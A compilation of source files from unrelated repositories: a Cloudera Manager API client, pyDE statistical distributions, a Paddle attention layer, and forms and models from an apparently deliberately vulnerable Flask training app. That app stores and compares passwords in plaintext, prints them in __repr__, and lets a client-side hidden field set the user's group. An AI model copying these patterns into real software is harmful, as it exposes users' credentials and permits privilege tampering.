cluster_name),
data=service_list).json()
def get_cluster_services(self, cluster_name, view='summary'):
"""Get a list of all services in the cluster.
Args:
cluster_name (:obj:`str`): The name of the cluster.
view (:obj:`str`, optional): The collection view. Could be ``summary`` or ``full``.
Default: ``summary``
Returns:
A dictionary (service list) of all services in the cluster.
"""
return self._get(endpoint='{}/clusters/{}/services'.format(self.api_version,
cluster_name),
params={'view': view}).json()
def delete_cluster_service(self, cluster_name, service_name):
"""Deletes a service from the cluster.
Args:
cluster_name (:obj:`str`): The name of the cluster.
service_name (:obj:`str`): The name of the service.
Returns:
A dictionary (service) of details of the deleted service.
"""
return self._delete(endpoint='{}/clusters/{}/services/{}'.format(self.api_version,
cluster_name,
service_name)).json()
def get_service_roles(self, cluster_name, service_name):
"""Get a list of roles of a given service.
Args:
cluster_name (:obj:`str`): The name of the cluster.
service_name (:obj:`str`): The name of the service.
Returns:
A dictionary (role list) of the roles of the service.
"""
return self._get(endpoint='{}/clusters/{}/services/{}/roles'.format(self.api_version,
cluster_name,
service_name)).json()
def get_service_role_config_groups(self, cluster_name, service_name):
"""Get a list of role config groups of a given service.
Args:
cluster_name (:obj:`str`): The name of the cluster.
service_name (:obj:`str`): The name of the service.
Returns:
A dictionary (role config group list) of the role config groups of the service.
"""
return self._get(endpoint=('{}/clusters/{}/services/{}/'
'roleConfigGroups').format(self.api_version,
cluster_name,
service_name)).json()
def get_service_role_config_group_config(self, cluster_name, service_name,
role_config_group_name, view='summary'):
"""Get the service role config group configuration.
Args:
cluster_name (:obj:`str`): The name of the cluster.
service_name (:obj:`str`): The name of the service.
role_config_group_name (:obj:`str`): The name of the role config group.
view (:obj:`str`, optional): The collection view. Could be ``summary`` or ``full``.
Default: ``summary``
Returns:
A dictionary (config list) of the current service role config group configuration.
"""
return self._get(endpoint=('{}/clusters/{}/services/{}/'
'roleConfigGroups/{}/config').format(self.api_version,
cluster_name,
service_name,
role_config_group_name),
params={'view': view}).json()
def update_service_role_config_group_config(self, cluster_name, service_name,
role_config_group_name, config_list):
"""Update the service role config group configuration values.
Args:
cluster_name (:obj:`str`): The name of the cluster.
service_name (:obj:`str`): The name of the service.
role_config_group_name (:obj:`str`): The name of the role config group.
config_list (:obj:`dict`)
Returns:
A dictionary (config list) of the updated service role config group configuration.
"""
return self._put(endpoint=('{}/clusters/{}/services/{}/'
'roleConfigGroups/{}/config').format(self.api_version,
cluster_name,
service_name,
role_config_group_name),
data=config_list).json()
def update_service_config(self, cluster_name, service_name, service_config):
"""Update the service configuration values.
Args:
cluster_name (:obj:`str`): The name of the cluster.
service_name (:obj:`str`): The name of the service.
service_config (:obj:`dict`)
Returns:
A dictionary (service config) of the new service configuration.
"""
return self._put(endpoint='{}/clusters/{}/services/{}/config'.format(self.api_version,
cluster_name,
service_name),
data=service_config).json()
def deploy_cluster_kerberos_client_config(self, cluster_name, host_ref_list):
"""Deploy cluster Kerberos client config.
Args:
cluster_name (:obj:`str`): The name of the cluster.
host_ref_list (:obj:`dict`)
Returns:
A dictionary (command) of the submitted command.
"""
return self._post(endpoint=('{}/clusters/{}/commands/'
'deployClusterClientConfig').format(self.api_version,
cluster_name),
data=host_ref_list).json()
def first_run_cluster_service(self, cluster_name, service_name):
"""Run firstRun on a service from the cluster. This command prepares and starts the service.
Args:
cluster_name (:obj:`str`): The name of the cluster.
service_name (:obj:`str`): The name of the service.
Returns:
A dictionary (command) of the submitted command.
"""
return self._post(endpoint=('{}/clusters/{}/services/{}/'
'commands/firstRun').format(self.api_version,
cluster_name,
service_name)).json()
def restart_cluster_service(self, cluster_name, service_name):
"""Restart a cluster service.
Args:
cluster_name (:obj:`str`): The name of the cluster.
service_name (:obj:`str`): The name of the service.
Returns:
A dictionary (command) of the submitted command.
"""
return self._post(endpoint=('{}/clusters/{}/services/{}/'
'commands/restart').format(self.api_version,
cluster_name,
service_name)).json()
def start_cluster_service(self, cluster_name, service_name):
"""Start a cluster service.
Args:
cluster_name (:obj:`str`): The name of the cluster.
service_name (:obj:`str`): The name of the service.
Returns:
A dictionary (command) of the submitted command.
"""
return self._post(endpoint=('{}/clusters/{}/services/{}/'
'commands/start').format(self.api_version,
cluster_name,
service_name)).json()
def stop_cluster_service(self, cluster_name, service_name):
"""Stop a cluster service.
Args:
cluster_name (:obj:`str`): The name of the cluster.
service_name (:obj:`str`): The name of the service.
Returns:
A dictionary (command) of the submitted command.
"""
return self._post(endpoint=('{}/clusters/{}/services/{}/'
'commands/stop').format(self.api_version,
cluster_name,
service_name)).json()
def update_all_hosts_config(self, config_list):
"""Update the default configuration values for all hosts.
Args:
config_list (:obj:`dict`)
Returns:
A dictionary (config list) of updated config values.
"""
return self._put(endpoint='{}/cm/allHosts/config'.format(self.api_version),
data=config_list).json()
def update_hive_metastore_namenodes(self, cluster_name, service_name):
"""Update the Hive Metastore to point to a NameNode's Nameservice.
Args:
cluster_name (:obj:`str`): The name of the cluster.
service_name (:obj:`str`): The name of the Hive service.
Returns:
A dictionary (command) of the submitted command.
"""
return self._post(endpoint=('{}/clusters/{}/services/{}/commands/'
'hiveUpdateMetastoreNamenodes').format(self.api_version,
cluster_name,
service_name)).json()
def format_hdfs_namenodes(self, cluster_name, service_name):
"""Format HDFS NameNodes.
Args:
cluster_name (:obj:`str`): The name of the cluster.
service_name (:obj:`str`): The name of the HDFS service.
Returns:
A dictionary (command) of the submitted command.
"""
role_name = [role['name'] for role in self.get_service_roles(cluster_name, service_name)['items']
if role['type'] == 'NAMENODE']
role_name_list = {'items': role_name}
return self._post(endpoint=('{}/clusters/{}/services/{}/roleCommands/'
'hdfsFormat').format(self.api_version,
cluster_name,
service_name),
data=role_name_list).json()
def get_cm_config(self, view='summary'):
"""Get CM configuration values.
Args:
view (:obj:`str`, optional): The collection view. Could be ``summary`` or ``full``.
Default: ``summary``
Returns:
A dictionary (config list) of updated config values.
"""
return self._get(endpoint='{}/cm/config'.format(self.api_version),
params=dict(view=view)).json()
def update_cm_config(self, config_list):
"""Update CM configuration values.
Args:
config_list (:obj:`dict`)
Returns:
A dictionary (config list) of updated config values.
"""
return self._put(endpoint='{}/cm/config'.format(self.api_version),
data=config_list).json()
def import_admin_credentials(self, username, password):
"""Import KDC admin credentials that CM needs to create Kerberos principals.
Args:
username (:obj:`str`): CM principal username.
password (:obj:`str`): CM principal password.
Returns:
A dictionary (command) of the submitted command.
"""
return self._post(endpoint='{}/cm/commands/importAdminCredentials'.format(self.api_version),
params=dict(username=username, password=password)).json()
def create_host_templates(self, cluster_name, host_template_list):
"""Create new host templates.
Args:
cluster_name (:obj:`str`): The name of the cluster.
host_template_list (:obj:`dict`)
Returns:
A dictionary (host template list) of the created host templates.
"""
return self._post(endpoint='{}/clusters/{}/hostTemplates'.format(self.api_version,
cluster_name),
data=host_template_list).json()
def apply_host_template(self, cluster_name, host_template_name, start_roles, host_ref_list):
"""Apply a host template to a collection of hosts.
Args:
cluster_name (:obj:`str`): The name of the cluster.
host_template_name (:obj:`str`): The name of the host template.
start_roles (:obj:`bool`): Start the newly-created roles.
host_ref_list (:obj:`dict`)
Returns:
A dictionary (command) of the submitted command.
"""
return self._post(endpoint=('{}/clusters/{}/hostTemplates/{}/'
'commands/applyHostTemplate').format(self.api_version,
cluster_name,
host_template_name),
params={'startRoles': start_roles},
data=host_ref_list).json()
def deploy_cluster_client_config(self, cluster_name):
"""Deploy the cluster-wide client configuration.
Args:
cluster_name (:obj:`str`): The name of the cluster.
Returns:
A dictionary (command) of the submitted command.
"""
return self._post(endpoint=('{}/clusters/{}/commands/'
'deployClientConfig').format(self.api_version,
cluster_name)).json()
def configure_cluster_for_kerberos(self, cluster_name):
"""Configure the cluster to use Kerberos.
Args:
cluster_name (:obj:`str`): The name of the cluster.
Returns:
A dictionary (command) of the submitted command.
"""
return self._post(endpoint=('{}/clusters/{}/commands/'
'configureForKerberos').format(self.api_version,
cluster_name),
data={}).json()
def get_cm_kerberos_principals(self):
"""Get list of Kerberos principals needed by the services being managed by Cloudera Manager.
Returns:
A dictionary (principal) of Kerberos principals needed by the services being managed by Cloudera Manager.
"""
return self._get(endpoint='{}/cm/kerberosPrincipals'.format(self.api_version)).json()
def start_all_cluster_services(self, cluster_name):
"""Start all cluster services in the cluster.
Args:
cluster_name (:obj:`str`): The name of the cluster.
Returns:
A dictionary (command) of the submitted command.
"""
return self._post(endpoint='{}/clusters/{}/commands/start'.format(self.api_version,
cluster_name)).json()
def stop_all_cluster_services(self, cluster_name):
"""Stop all cluster services in the cluster.
Args:
cluster_name (:obj:`str`): The name of the cluster.
Returns:
A dictionary (command) of the submitted command.
"""
return self._post(endpoint='{}/clusters/{}/commands/stop'.format(self.api_version,
cluster_name)).json()
def get_cm_service(self, view='summary'):
"""Get Cloudera Manager Services service.
Args:
view (:obj:`str`, optional): The collection view. Could be ``summary`` or ``full``.
Default: ``summary``
Returns:
A dictionary (service) of the Cloudera Manager Services service.
"""
return self._get(endpoint='{}/cm/service'.format(self.api_version),
params=dict(view=view)).json()
def start_cm_service(self):
"""Start the Cloudera Manager Services.
Returns:
A dictionary (command) of the submitted command.
"""
return self._post(endpoint='{}/cm/service/commands/start'.format(self.api_version)).json()
def begin_trial(self):
"""Begin the trial license for this Cloudera Manager instance.
This allows the user to have enterprise-level features for a 60-day trial period.
"""
self._post(endpoint='{}/cm/trial/begin'.format(self.api_version))
def create_cm_roles(self, role_list):
"""Create Cloudera Manager roles.
Args:
role_list (:obj:`list`)
Returns:
A list (role list) of the created Cloudera Manager roles.
"""
return self._post(endpoint='{}/cm/service/roles'.format(self.api_version),
data=role_list).json()
def update_cm_service_role_config_group_config(self, role_config_group_name, config_list):
"""Update the configuration values for Cloudera Manager service role config group.
Args:
role_config_group_name (:obj:`str`): The name of the role config group.
config_list (:obj:`dict`)
Returns:
A dictionary (config list) of the updated service role config group configuration.
"""
return self._put(endpoint=('{}/cm/service/roleConfigGroups/{}/config').format(self.api_version,
role_config_group_name),
data=config_list).json()
def get_command_information(self, command_id):
"""Get detailed information on an asynchronous command.
Args:
command_id (:obj:`str`): The command ID.
Returns:
A dictionary (command) of the submitted command.
"""
return self._get(endpoint='{}/commands/{}'.format(self.api_version,
command_id)).json()
def inspect_hosts(self, cluster_name):
"""Inspect hosts in the cluster.
Args:
cluster_name (:obj:`str`): The name of the cluster.
Returns:
A dictionary (command) of the submitted command.
"""
return self._post(endpoint='{}/clusters/{}/commands/inspectHosts'.format(self.api_version,
cluster_name)).json()
def list_all_clusters(self):
"""List clusters.
Returns:
A list of the clusters.
"""
return self._get(endpoint='{}/clusters'.format(self.api_version)).json()
def download_command_output(self, command_id):
"""Return the output of download of the command.
Args:
command_id (:obj:`str`): The command ID.
Returns:
Contents of the download.
"""
return self._get(endpoint='/command/{}/download'.format(command_id), endpoint_suffix='/cmf').json()
def _get_api_version(self):
api_version = self._get(endpoint='/version').text
if not api_version.startswith('v'):
raise Exception('/api/version returned unexpected result ({}).'.format(api_version))
else:
logger.info('Detected CM API %s.', api_version)
return api_version
def _get(self, endpoint, endpoint_suffix='/api', params=None):
url = join_url_parts(self.server_url, endpoint_suffix, endpoint)
logger.debug('Sending GET request to URL (%s) with parameters (%s) ...',
url,
params or 'None')
response = self.session.get(url, params=params or {})
if response.status_code != requests.codes.ok:
logger.error(response.text)
response.raise_for_status()
return response
def _post(self, endpoint, params=None, data=None):
url = join_url_parts(self.server_url, '/api', endpoint)
data = json.dumps(data)
logger.debug('Sending POST request to URL (%s) with parameters (%s) and data (%s) ...',
url,
params or 'None',
data or 'None')
response = self.session.post(url, params=params or {}, data=data)
if response.status_code != requests.codes.ok:
logger.error(response.text)
response.raise_for_status()
return response
def _delete(self, endpoint, params=None, data=None):
url = join_url_parts(self.server_url, '/api', endpoint)
data = json.dumps(data)
logger.debug('Sending DELETE request to URL (%s) with parameters (%s) and data (%s) ...',
url,
params or 'None',
data or 'None')
response = self.session.delete(url, params=params or {}, data=data)
if response.status_code != requests.codes.ok:
logger.error(response.text)
response.raise_for_status()
return response
def _put(self, endpoint, params=None, data=None):
url = join_url_parts(self.server_url, '/api', endpoint)
data = json.dumps(data)
logger.debug('Sending PUT request to URL (%s) with parameters (%s) and data (%s) ...',
url,
params or 'None',
data or 'None')
response = self.session.put(url, params=params or {}, data=data)
if response.status_code != requests.codes.ok:
logger.error(response.text)
response.raise_for_status()
return response
```
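A typical round trip with the client above might look like the following sketch. The host, credentials, cluster name, and service name are placeholders, and the response fields used ('items', 'hostname', 'id', 'active', 'success') follow the usual Cloudera Manager API payload shapes rather than anything guaranteed by this module:
```python
# hypothetical endpoint and credentials
client = ApiClient('http://cm-host.example.com:7180',
                   username='admin', password='admin')

hosts = client.get_all_hosts(view='full')
print([host['hostname'] for host in hosts['items']])

# restart a service and check on the asynchronous command it returns
command = client.restart_cluster_service('cluster', 'HDFS-1')
status = client.get_command_information(command['id'])
print(status.get('active'), status.get('success'))
```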
|
{
"source": "jeff324/pyDE",
"score": 2
}
|
#### File: pyDE/pyDE/distributions.py
```python
import numpy as np
from scipy.stats import norm
from scipy.stats import uniform
from scipy.stats import truncnorm
def lba_logpdf(rt, response, b, A, v, s, t0):
def fptpdf(z,x0max,chi,driftrate,sddrift):
if x0max<1e-10:
out = (chi/np.power(z,2)) * norm.pdf(chi/z,loc=driftrate,scale=sddrift)
return out
zs = z*sddrift
zu = z*driftrate
chiminuszu = chi-zu
chizu = chiminuszu/zs
chizumax = (chiminuszu-x0max)/zs
out = (driftrate*(norm.cdf(chizu)-norm.cdf(chizumax)) + sddrift*(norm.pdf(chizumax)-norm.pdf(chizu)))/x0max
return out
def fptcdf(z,x0max,chi,driftrate,sddrift):
if x0max < 1e-10:
return norm.cdf(chi/z,loc=driftrate,scale=sddrift)
zs = z * sddrift
zu = z * driftrate
chiminuszu = chi - zu
xx = chiminuszu - x0max
chizu = chiminuszu / zs
chizumax = xx / zs
tmp1 = zs * (norm.pdf(chizumax)-norm.pdf(chizu))
tmp2 = xx * norm.cdf(chizumax) - chiminuszu * norm.cdf(chizu)
return 1 + (tmp1 + tmp2) / x0max
def lba_pdf(t,x0max,chi,drift,sdI):
G = 1-fptcdf(z=t,x0max=x0max[1],chi=chi[1],driftrate=drift[1],sddrift=sdI[1])
out = G*fptpdf(z=t,x0max=x0max[0],chi=chi[0],driftrate=drift[0],sddrift=sdI[0])
out = out / (1 - (norm.cdf(-drift[0]/sdI[0]) * norm.cdf(-drift[1]/sdI[1])))
out[t<=0]=0
return out
def get_dens(rt, response, b, A, v, s, t0):
out = np.zeros(len(rt))
out[response==1] = lba_pdf(t=rt[response==1]-t0,x0max=[A,A],chi=[b,b],drift=v,sdI=s)
out[response==2] = lba_pdf(t=rt[response==2]-t0,x0max=[A,A],chi=[b,b],drift=[v[1],v[0]],sdI=[s[1],s[0]])
out = np.maximum(out,1e-10)
return out
return np.log(get_dens(rt, response, b, A, v, s, t0))
def lba_rvs(n,b,A,v,s,t0):
drift_1 = norm.rvs(loc=v[0],scale=s[0],size=n)
drift_2 = norm.rvs(loc=v[1],scale=s[1],size=n)
drift_1[drift_1 < 0] = 0
drift_2[drift_2 < 0] = 0
start_1 = np.array(uniform.rvs(loc=0,scale=A,size=n))
start_2 = np.array(uniform.rvs(loc=0,scale=A,size=n))
ttf_1 = (b-start_1) / drift_1
ttf_2 = (b-start_2) / drift_2
rt = np.minimum(ttf_1,ttf_2) + t0
ttf = np.column_stack((ttf_1,ttf_2))
resp = np.argmin(ttf,axis=1) + 1 #1=v1 accumulator, 2=v2 accumulator
return {'rt':rt,'resp':resp}
def truncnorm_logpdf(x,loc,scale,a=0,b=float('inf')):
a = (a - loc) / (scale)
b = (b - loc) / (scale)
lp = truncnorm.logpdf(x=x,loc=loc,scale=scale,a=a,b=b)
return lp
def truncnorm_rvs(size,loc,scale,a=0,b=float('inf')):
a = (a - loc) / (scale)
b = (b - loc) / (scale)
rv = truncnorm.rvs(size=size,loc=loc,scale=scale,a=a,b=b)
return rv
```
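A quick round trip with the LBA helpers above: draw simulated choice/RT data with `lba_rvs`, then score it with `lba_logpdf` (the parameter values are arbitrary illustrations, and both functions are assumed to be in scope from the module above):
```python
import numpy as np

# threshold b, start-point range A, drift means v, drift SDs s, non-decision time t0
b, A, v, s, t0 = 1.0, 0.5, [1.2, 0.8], [0.3, 0.3], 0.2

data = lba_rvs(n=500, b=b, A=A, v=v, s=s, t0=t0)
logp = lba_logpdf(data['rt'], data['resp'], b=b, A=A, v=v, s=s, t0=t0)
print(data['rt'][:5], data['resp'][:5])
print('summed log-likelihood:', np.sum(logp))
```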
#### File: pyDE/pyDE/utils.py
```python
def idx(*args):
return '.'.join(map(str,list(args)))
```
|
{
"source": "jeff350/vulnerable-company-webapp-flask",
"score": 3
}
|
#### File: vulnerable-company-webapp-flask/vuln_corp/forms.py
```python
from flask_wtf import Form
from wtforms import StringField, SelectField, SubmitField, validators, PasswordField, HiddenField
from wtforms.fields.html5 import EmailField
from wtforms.widgets import TextArea
from vuln_corp.choices import ISSUE_STATUS, ISSUE_ASSIGNEES
from .models import User
class LoginForm(Form):
username = StringField("username", [validators.DataRequired("Please enter your username.")])
password = PasswordField('Password', [validators.DataRequired("Please enter a password.")])
submit = SubmitField("Sign In")
def __init__(self, *args, **kwargs):
Form.__init__(self, *args, **kwargs)
def validate(self):
if not Form.validate(self):
return False
user = User.query.filter(User.username == self.username.data.lower()).first()
if user and user.check_password(self.password.data):
return True
elif not user:
self.username.errors.append("Invalid username")
else:
self.password.errors.append("Invalid password")
return False
class SignupForm(Form):
username = StringField("username", [validators.DataRequired("Please enter your username."), validators.length(4, 32,
"Your username must be between %(min)d and %(max)d characters")])
firstname = StringField("First name", [validators.DataRequired("Please enter your first name.")])
lastname = StringField("Last name", [validators.DataRequired("Please enter your last name.")])
email = EmailField("Email", [validators.DataRequired("Please enter your email address."),
validators.Email("Please enter your email address.")])
group = HiddenField(u'Group', default='2')
password = PasswordField('Password', [validators.DataRequired("Please enter a password."), validators.length(2, 12,
"Your password must be between %(min)d and %(max)d characters.")])
bio = StringField('Bio', [])
submit = SubmitField("Create account")
def __init__(self, *args, **kwargs):
Form.__init__(self, *args, **kwargs)
def validate(self):
if not Form.validate(self):
return False
elif User.query.filter(User.username == str(self.username.data.lower())).first() is not None:
self.username.errors.append("Username is already taken")
return False
elif User.query.filter(User.email == str(self.email.data.lower())).first() is not None:
self.email.errors.append("E-mail is already taken")
return False
else:
return True
class EditUserForm(Form):
firstname = StringField("First name", [validators.DataRequired("Please enter your first name.")])
lastname = StringField("Last name", [validators.DataRequired("Please enter your last name.")])
email = EmailField("Email", [validators.DataRequired("Please enter your email address."),
validators.Email("Please enter your email address.")])
group = SelectField(u'Group', coerce=int)
password = StringField('Password', [validators.DataRequired("Please enter a password."), validators.length(2, 12,
"Your password must be between %(min)d and %(max)d characters.")])
bio = StringField('Bio', [])
submit = SubmitField("edit profile")
def __init__(self, *args, **kwargs):
Form.__init__(self, *args, **kwargs)
class IssueForm(Form):
title = StringField("Title", [validators.DataRequired("Enter a title for the issue")])
summary = StringField("Issue", [validators.DataRequired("Enter Your issue here")], widget=TextArea())
def __init__(self, *args, **kwargs):
Form.__init__(self, *args, **kwargs)
class EditIssueForm(Form):
title = StringField("Title", [validators.DataRequired("Enter a title for the issue")])
summary = StringField("Issue", [validators.DataRequired("Enter Your issue here")], widget=TextArea())
status = SelectField('type', choices=ISSUE_STATUS)
assignee = SelectField(u'User', choices=ISSUE_ASSIGNEES)
def __init__(self, *args, **kwargs):
Form.__init__(self, *args, **kwargs)
```
#### File: vulnerable-company-webapp-flask/vuln_corp/models.py
```python
import datetime
from vuln_corp import db
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(32), unique=True)
firstname = db.Column(db.String(32))
lastname = db.Column(db.String(32))
picture = db.Column(db.String(64))
bio = db.Column(db.String())
password = db.Column(db.String(32), unique=False)
group = db.Column(db.Integer)
email = db.Column(db.String(64), unique=True)
creation_date = db.Column(db.DateTime)
def __init__(self, username, firstname, lastname, email, password, group, bio):
self.username = username.lower()
self.firstname = firstname.title()
self.lastname = lastname.title()
self.email = email.lower()
self.password = password
self.group = group
self.picture = 'static/default.jpg'
self.creation_date = datetime.datetime.now()
self.bio = bio
def check_password(self, password):
        return password == self.password
def get_fullname(self):
return str(self.firstname) + ' ' + str(self.lastname)
def get_group(self):
return Groups.query.filter(Groups.id == self.group).first().groupname
def get_groupid(self, id):
return Groups.query.filter(Groups.id == id).first().groupname
    def exists(self):
        # True if a row with this username is already stored in the database.
        return User.query.filter(User.username == self.username).first() is not None
def get_session(self):
return Session.query.filter(Session.username == self.username).first()
def __repr__(self):
return '<Username:{} Password:{}>'.format(self.username, self.password)
class Session(db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(32), db.ForeignKey('user.username'))
session_id = db.Column(db.String(32), unique=True)
active = db.Column(db.Boolean)
def __init__(self, username, session_id, active):
self.username = username
self.session_id = session_id
self.active = active
def get_user(self):
return User.query.filter(User.username == self.username).first()
def __repr__(self):
return '<User:{} session_id:{} active:{}>'.format(self.username, self.session_id, self.active)
class Groups(db.Model):
id = db.Column(db.Integer, primary_key=True)
groupname = db.Column(db.String(64), unique=True)
def __init__(self, groupname):
self.groupname = groupname
def __repr__(self):
return '<group:{}>'.format(self.groupname)
class Issues(db.Model):
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String(100))
summary = db.Column(db.String(1000))
status = db.Column(db.String(60))
reported_by = db.Column(db.String(32))
assignee = db.Column(db.String(32))
completed = db.Column(db.Boolean)
completed_date = db.Column(db.DateTime)
issued_date = db.Column(db.DateTime)
def __init__(self, summary, title, reported_by):
self.summary = summary
self.title = title
self.status = 'New'
self.reported_by = reported_by
self.assignee = 'unassigned'
self.completed = False
self.issued_date = datetime.datetime.now()
self.completed_date = None
def mark_completed(self):
self.completed = True
self.completed_date = datetime.datetime.now()
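if __name__ == '__main__':
    # Minimal usage sketch with illustrative values only: constructing a model
    # instance needs no database, but persisting it would additionally require
    # an application context and a configured `db` session.
    demo_user = User('jdoe', 'Jane', 'Doe', 'jdoe@example.com', 'secret', 2, 'demo account')
    print(demo_user.get_fullname())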
```
|
{
"source": "jeff41404/PaddleNLP",
"score": 3
}
|
#### File: information_extraction/wordtag/predictor.py
```python
import json
import paddle
import paddle.nn as nn
from paddlenlp.datasets import MapDataset
from paddlenlp.data import Stack, Pad, Tuple
from paddlenlp.transformers import ErnieCtmWordtagModel, ErnieCtmTokenizer
class WordtagPredictor(object):
"""Predictor of wordtag model.
"""
def __init__(self, model_dir, tag_path, linking_path=None):
"""Initialize method of the predictor.
Args:
model_dir: The pre-trained model checkpoint dir.
tag_path: The tag vocab path.
            linking_path: The linking feature file to load if you want to use linking mode.
"""
self._tags_to_index, self._index_to_tags = self._load_labels(tag_path)
self._model = ErnieCtmWordtagModel.from_pretrained(
model_dir,
num_cls_label=4,
num_tag=len(self._tags_to_index),
ignore_index=self._tags_to_index["O"])
self._model.eval()
self._tokenizer = ErnieCtmTokenizer.from_pretrained(model_dir)
self._summary_num = self._model.ernie_ctm.content_summary_index + 1
self.linking = False
if linking_path is not None:
self.linking_dict = {}
with open(linking_path, encoding="utf-8") as fp:
for line in fp:
data = json.loads(line)
if data["label"] not in self.linking_dict:
self.linking_dict[data["label"]] = []
self.linking_dict[data["label"]].append({
"sid": data["sid"],
"cls": paddle.to_tensor(data["cls1"]).unsqueeze(0),
"term": paddle.to_tensor(data["term"]).unsqueeze(0)
})
self.linking = True
self.sim_fct = nn.CosineSimilarity(dim=1)
@property
def summary_num(self):
"""Number of model summary token
"""
return self._summary_num
@staticmethod
def _load_labels(tag_path):
tags_to_idx = {}
i = 0
with open(tag_path, encoding="utf-8") as fp:
for line in fp:
line = line.strip()
tags_to_idx[line] = i
i += 1
idx_to_tags = dict(zip(*(tags_to_idx.values(), tags_to_idx.keys())))
return tags_to_idx, idx_to_tags
def _pre_process_text(self, input_texts, max_seq_len=128, batch_size=1):
infer_data = []
max_length = 0
for text in input_texts:
tokens = ["[CLS%i]" % i
for i in range(1, self.summary_num)] + list(text)
tokenized_input = self._tokenizer(
tokens,
return_length=True,
is_split_into_words=True,
max_seq_len=max_seq_len)
infer_data.append([
tokenized_input['input_ids'], tokenized_input['token_type_ids'],
tokenized_input['seq_len']
])
infer_ds = MapDataset(infer_data)
batchify_fn = lambda samples, fn=Tuple(
Pad(axis=0, pad_val=self._tokenizer.pad_token_id,dtype='int64'), # input_ids
Pad(axis=0, pad_val=self._tokenizer.pad_token_type_id,dtype='int64'), # token_type_ids
Stack(dtype='int64'), # seq_len
): fn(samples)
infer_data_loader = paddle.io.DataLoader(
infer_ds,
collate_fn=batchify_fn,
num_workers=0,
batch_size=batch_size,
shuffle=False,
return_list=True)
return infer_data_loader
def _decode(self, batch_texts, batch_pred_tags):
batch_results = []
for i, pred_tags in enumerate(batch_pred_tags):
pred_words, pred_word = [], []
text = batch_texts[i]
for j, tag in enumerate(pred_tags[self.summary_num:-1]):
if j > len(text) + self.summary_num - 1:
continue
pred_label = self._index_to_tags[tag]
if pred_label.find("-") != -1:
_, label = pred_label.split("-")
else:
label = pred_label
if pred_label.startswith("S") or pred_label.startswith("O"):
pred_words.append({
"item": text[j],
"offset": 0,
"wordtag_label": label
})
else:
pred_word.append(text[j])
if pred_label.startswith("E"):
pred_words.append({
"item": "".join(pred_word),
"offset": 0,
"wordtag_label": label
})
del pred_word[:]
for i in range(len(pred_words)):
if i > 0:
pred_words[i]["offset"] = pred_words[i - 1]["offset"] + len(
pred_words[i - 1]["item"])
pred_words[i]["length"] = len(pred_words[i]["item"])
result = {"text": text, "items": pred_words}
batch_results.append(result)
return batch_results
@paddle.no_grad()
def run(self,
input_texts,
max_seq_len=128,
batch_size=1,
return_hidden_states=None):
"""Predict a input text by wordtag.
Args:
input_text: input text.
max_seq_len: max sequence length.
batch_size: Batch size per GPU/CPU for training.
Returns:
dict -- wordtag results.
"""
if isinstance(input_texts, str):
input_texts = [input_texts]
if not isinstance(input_texts, str) and not isinstance(input_texts,
list):
raise TypeError(
f"Bad inputs, input text should be str or list of str, {type(input_texts)} found!"
)
infer_data_loader = self._pre_process_text(input_texts, max_seq_len,
batch_size)
all_pred_tags = []
with paddle.no_grad():
for batch in infer_data_loader:
input_ids, token_type_ids, seq_len = batch
seq_logits, cls_logits = self._model(
input_ids, token_type_ids, lengths=seq_len)
scores, pred_tags = self._model.viterbi_decoder(seq_logits,
seq_len)
all_pred_tags += pred_tags.numpy().tolist()
results = self._decode(input_texts, all_pred_tags)
outputs = results
if return_hidden_states is True:
outputs = (results, ) + (seq_logits, cls_logits)
return outputs
def _post_linking(self, pred_res, hidden_states):
for pred in pred_res:
for item in pred["items"]:
if item["item"] in self.linking_dict:
item_vectors = self.linking_dict[item["item"]]
item_pred_vector = hidden_states[1]
res = []
for item_vector in item_vectors:
vec = item_vector["cls"]
similarity = self.sim_fct(vec, item_pred_vector)
res.append({
"sid": item_vector["sid"],
"cosine": similarity.item()
})
res.sort(key=lambda d: -d["cosine"])
item["link"] = res
def run_with_link(self, input_text):
"""Predict wordtag results with term linking.
Args:
input_text: input text
Raises:
ValueError: raise ValueError if is not linking mode.
Returns:
pred_res: result with linking.
"""
if self.linking is False:
raise ValueError(
"Not linking mode, you should initialize object by ``WordtagPredictor(model_dir, linking_path)``."
)
pred_res = self.run(input_text, return_hidden_states=True)
self._post_linking(pred_res[0], pred_res[1:])
return pred_res[0]
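if __name__ == "__main__":
    # Minimal usage sketch: the checkpoint directory and tag vocab path below
    # are placeholders rather than files shipped with this module; a trained
    # wordtag checkpoint is assumed to exist at those locations.
    predictor = WordtagPredictor("./wordtag_model", "./wordtag_model/tags.txt")
    print(predictor.run(["热梅茶是一道以梅子为主要原料制作的茶饮"]))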
```
|
{
"source": "jeff41404/Paddle",
"score": 2
}
|
#### File: nn/layer/fused_transformer.py
```python
from paddle.nn import functional as F
from paddle.incubate.nn import functional as incubate_f
from paddle.nn import Layer
from paddle.framework import ParamAttr
import paddle
from paddle.nn.layer.transformer import _convert_attention_mask, _convert_param_attr_to_list
from paddle.nn.initializer import Constant
import collections
class FusedMultiHeadAttention(Layer):
"""
    Attention maps queries and a set of key-value pairs to outputs, and
    Multi-Head Attention performs multiple parallel attentions to jointly attend
    to information from different representation subspaces.
Please refer to `Attention Is All You Need <https://arxiv.org/pdf/1706.03762.pdf>`_
for more details.
Parameters:
embed_dim (int): The expected feature size in the input and output.
num_heads (int): The number of heads in multi-head attention.
dropout_rate (float, optional): The dropout probability used on attention
weights to drop some attention targets for the dropout after attention.
0 for no dropout. Default 0.5.
attn_dropout_rate (float, optional): The dropout probability used on attention
weights to drop some attention targets for the dropout in attention.
0 for no dropout. Default 0.5.
kdim (int, optional): The feature size in key. If None, assumed equal to
`embed_dim`. Default None.
vdim (int, optional): The feature size in value. If None, assumed equal to
`embed_dim`. Default None.
normalize_before (bool, optional): Indicate whether it is pre_layer_norm (True)
or post_layer_norm architecture (False). Default False.
need_weights (bool, optional): Indicate whether to return the attention
weights. Now, only False is supported. Default False.
weight_attr(ParamAttr, optional): To specify the weight parameter property.
Default: None, which means the default weight parameter property is used.
See usage for details in :code:`ParamAttr` .
bias_attr (ParamAttr|bool, optional): To specify the bias parameter property.
Default: None, which means the default bias parameter property is used.
If it is set to False, this layer will not have trainable bias parameter.
See usage for details in :code:`ParamAttr` .
Examples:
.. code-block:: python
# required: gpu
import paddle
# input: [batch_size, sequence_length, embed_dim]
query = paddle.rand((2, 4, 128))
# self attention mask: [batch_size, num_heads, query_len, query_len]
attn_mask = paddle.rand((2, 2, 4, 4))
multi_head_attn = paddle.incubate.nn.FusedMultiHeadAttention(128, 2)
